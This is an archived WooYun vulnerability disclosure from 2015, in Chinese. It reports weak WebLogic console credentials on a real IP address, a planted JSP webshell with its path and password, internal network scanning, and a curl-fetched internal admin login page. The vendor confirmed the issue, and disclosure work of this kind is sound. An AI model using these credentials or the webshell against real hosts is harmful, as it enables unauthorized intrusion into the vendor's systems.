乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-21: 细节已通知厂商并且等待厂商处理中 2015-12-21: 厂商已经确认,细节仅向厂商公开 2015-12-31: 细节向核心白帽子及相关领域专家公开 2016-01-10: 细节向普通白帽子公开 2016-01-20: 细节向实习白帽子公开 2016-02-01: 细节向公众公开
RT
http://115.182.9.109/consoleweblogic弱口令weblogicweblogic1貌似是个手机接口站
getshell地址http://115.182.9.109/ca/ma3.jsp密码carry有时会404,请多回车几遍即可
内网IP,可进一步威胁内网安全!扫下内网段
curl个内网后台管理看看
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>后台管理</title><link rel="stylesheet" type="text/css" media="all" href="css/login.css" /><script type='text/javascript' src='js/md5.js'></script><script type="text/javascript" src="js/jquery.js"></script><script type='text/javascript'> function check_form(){ var username=document.getElementById("username").value; var password=document.getElementById("password").value; if(password==""||username==""){ alert('登录名与密码不能为空 ');return false; } } window.onload = function(){document.getElementById('username').focus();}</script></head><body><div id="login"><div class="warp"><div class="content"><h1></h1><form name="adminform" id="adminform" action="/index.php?action=login-checklogin" method="post" onsubmit="return check_form();"><div class="item"><div class="input"><div class="icon" title="用户名"></div><input type="text" name="username" id="username" /></div><label>用户名:</label></div><div class="item"><div class="input"><div class="icon2" title="密码"></div><input type="password" name="password" id="password" /></div><label>密码:</label></div><input type="submit" name="submit" class="submit" value="" /></form><p class="copyright">若有任何疑问,请点击帮助或与管理员联系©2012 ctvit.com.cn</p></div></div></div><script type="text/javascript">$(document).ready(function(){ $('form #adminform').submit(function(){ var status = false; $.post( 'index.php?action=login-rchecklogin', {username:$('#username').val(),password:$('#password').val()}, function(ret){ if(ret=="1"){ location.reload(); status = true; }else{ alert('用户名或密码错误,请重试!'+ret); } } ); return status; });})</script></body></html>
未深入,仅作危害证明!
修改弱口令。getshell求20rank!
危害等级:高
漏洞Rank:20
确认时间:2015-12-21 10:36
非常感谢。
暂无